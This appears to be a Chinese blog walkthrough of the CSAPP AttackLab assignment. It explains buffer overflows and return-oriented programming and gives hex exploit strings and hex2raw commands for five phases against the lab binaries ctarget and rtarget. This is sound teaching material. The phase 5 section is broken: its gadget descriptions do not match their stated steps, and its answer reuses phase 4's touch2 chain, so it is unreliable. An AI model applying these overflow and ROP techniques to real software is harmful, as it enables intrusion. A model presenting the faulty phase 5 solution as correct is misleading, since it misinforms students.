当前位置：首页 > news >正文

lab3 CSAPP：AttackLab

news 2025/10/19 7:15:31

写在前面

Attacklab 的文件是 target1.tar，解压后可以得到一个日录，一共六个文件：

cookie.txt 一个8位16进制数，作为攻击的特殊标志符
farm.c 在ROP攻击中作为gadgets的产生源
ctarget 代码注入攻击的目标文件
rtarget ROP攻击的目标文件
hex2raw 将16进制数转化为攻击字符，因为有些字符在屏幕上面无法输入，所以输入该字符的16进制数，自动转化为该字符

ROP是什么

缓冲区溢出攻击可以采用栈随机化、栈破坏检测(金丝雀)、限制可执行代码区域这三种机制来限制(详见csapp 3.10.4)
为了对抗这些机制，又出现了ROP攻击技术。
ROP全称为Return-oriented Programmming(面向返回的编程)是一种新型的基于代码复用技术的攻击，攻击者从已有的库或可执行文件中提取指令片段，构建恶意代码。
ROP攻击同缓冲区溢出攻击，格式化字符串漏洞攻击不同，是一种全新的攻击方式，它利用代码复用技术。
ROP的核心思想：攻击者扫描已有的动态链接库和可执行文件，提取出可以利用的指令片段(gadget)，这些指令片段均以ret指令结尾，即用ret指令实现指令片段执行流的衔接。

callq 和 retq

callq 是函数调用指令，retq是函数返回指令，它们中的 q 代表64位操作数(即操作数是8字节)。

CPU 执行 callq function指令时，相当于执行如下两步操作：

pushq%rip (保存rip寄存器的值到栈顶)
jmp function (跳转到function处执行)

CPU执行 “retq” 指令相当于执行了 “popq %rip” 指令，也就是将栈顶的数据取出放入%rip。

目标

phase_1

首先得了解一下缓冲区溢出：

C 语言的 scanf 和 gets 其实是很不安全的，如果输入数据的规模大于接收缓冲区，那么就会越界了。

level1 让我们在getbuf 溢出的时候，跳转到 touch1函数。

这个要了解一下栈帧的组织：

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

函数调用者会先把返回地址压栈，然后调用函数在执行过程中按需开辟栈空间。

我们如果想要溢出后，进入touch1函数，那么我们只需把返回地址改为touch1的地址即可。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

我们发现，getbuf开了 0x28 = 40个字节的栈空间。

那么我们只需随便填40个字节，接下来填 touch1 的地址即可。

答案放在 phase_1.txt里：

00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00

输入即可

./hex2raw -i phase_1.txt | ./ctarget -q

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

phase_2

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

phase_2 要求跳转到 touch2

touch2 的参数val通过 rdi 传递，并且这个值应该等于 cookie

然后限制我们只能使用ret

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

touch2的逻辑很简单，只要传入参数的值为cookie就行了。

cookie 已知是0x59b997fa （在cookie.txt内）

所以我们要做的事情是什么？

把cookie 存入 $rdi
movq $0x59b997fa, %rdi
把touch2的地址 压栈
pushq $0x4017ec
返回
ret

我们可以用 gcc 得到上面汇编代码的机器码：

48 c7 c7 fa 97 b9 59
68 ec 17 40 00
c3

因为getbuf 开了 40个字节的栈空间，所以这40个字节的开头放我们上面这三条指令。

剩下不足40字节的用0填充。

然后把 rsp 的值放在返回地址的地方，这样溢出的时候会跳到 rsp 的位置开始执行我们的上面三条指令。

rsp 值的获取：

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

答案放在 phase_2.txt里：

48 c7 c7 fa 97 b9 59
68 ec 17 40 00
c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00
78 dc 61 55 00 00 00 00

输入即可

./hex2raw -i phase_2.txt | ./ctarget -q

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

phase_3

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

根据提示可以知道，hexmatch 会覆盖掉 getbuf的栈空间，那么我们之前的策略就不再适用了。

不过我们还是先来考虑注入什么代码

把存放cookie字符串的地址存入 $rdi
把 touch3的地址压栈
ret

我们发现，关键问题在于这段代码放在哪？字符串放在哪？

因为 test 调用了getbuf，而getbuf 开了40个字节的栈空间，那么过了这40个字节，再往上就是 test 的栈空间

我们可以利用test 的栈空间！

已知 getbuf 的 rsp = 0x5561dc78

因为栈向下增长，所以 test 的 rsp = 0x5561dc78 + 0x28 = 0x5561dca0

那么我们可以把注入代码放在 0x5561dca0的位置

目标字符串放在 0x5561dca8的位置

可以得出注入代码为：

mov    $0x5561dca8,%rdi
pushq  $0x4018fa
ret

利用gcc -c获取机器码

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

把答案放入 phase_3.txt：

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
b8 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61
00 00 00 00 00 00 00 00
48 c7 c7 a8 dc 61 55
68 fa 18 40 00
c3 00 00 00

运行

 ./hex2raw -i phase_3.txt | ./ctarget -q

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

phase_4

首先要了解下 Retrun-Oriented Programming

前面三个phase 我们都是通过代码注入，来进行攻击。

但是有一个问题，ctarget 的栈地址固定，而 rtarget 采用了三种技术来阻止代码注入攻击：

随机栈偏移。这让我们很难找到程序的地址
栈破坏检查。现在的编译器(如gcc)会在生成可执行文件时加入安全策略，其思路是：在栈帧中任何局部缓冲区和栈状态之间存储一个特殊的金丝雀值。该值从一个内存地址中选择，在恢复寄存器状态和从函数返回之前，程序检查这个金丝雀值是否被改变。如果被改变，说明栈被破坏过，程序直接异常终止。(不过在这次实验中并没有开启这个机制，因为之后的实验还是需要依靠溢出。)
标记为不可执行区域。这使得我们的攻击代码无法被执行。

此时我们不能通过代码注入的方式来进行攻击了，pdf 中介绍了 ROP 这种方式。

汇编指令就是一些二进制机器码，我们通过机器码的片段，是可以组合出我们想要的指令的。

我们把栈中放上很多地址，而每次ret都会到一个Gadget(小的代码片段，并且会ret)，这样就可以形成一个程序链。通过将程序自身(./rtarget)的指令来完成我们的目的。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

在这个phase，保证了我们想要的gadgets 都可以在rtarget中组合出来。
然后限制了我们只能用两个gadgets
当一个小gadgets使用pop指令。你的exploit string中必须含有一个地址和data。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

pdf中给了一个encoding表。

我们现在想要跳到touch2，需要把 cookie 传入 rdi

而cookie 本身得先放到一个寄存器

所以思路就是：

getbuf 的返回地址起始地址，我们让其返回到一个 popq %rax ; ret
然后把 cookie getbuf 的返回地址起始地址的下一行，这样在调用 popq %rax的时候，会把cookie弹入 rax
然后再下一行，填一个 movq %rax, %rdi ; ret;的地址
再下一行，放touch2的地址

答案放入 phase_4.txt：

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
a2 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00

执行

./hex2raw -i phase_4.txt | ./rtarget -q

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

phase_5

和 phase_3 一样，我们需要做的就是把字符串的起始地址，传送到%rdi，然后调用touch3。

前面已经知道hexmatch会覆盖掉 getbuf的栈空间，所以我们要借助test的栈帧来放置字符串。

因为栈随机化，所以我们无法直接定位字符串的位置。

我们可以先获取 %rsp的地址，然后根据偏移量来计算字符串起始地址

思路：

首先获取 %rsp的地址，并且传送到%rdi
- movq %rsp, %rax 地址为 0x401a06
然后获取到字符串的偏移量值，并且传送到%rsi
- movq %rax, %rdi 地址为 0x4019a2
lea (%rdi,%rsi,1), %rax，将字符串的首地址传送到%rax，再传送到%rdi
- popq %rax 地址为 0x4019cc
最后调用touch3函数
- movl %eax, %edx 的地址为 0x4019dd

答案放入 phase_5.txt：

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
a2 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00
35 39 62 39 39 37 66 61
00 00 00 00 00 00 00 00

执行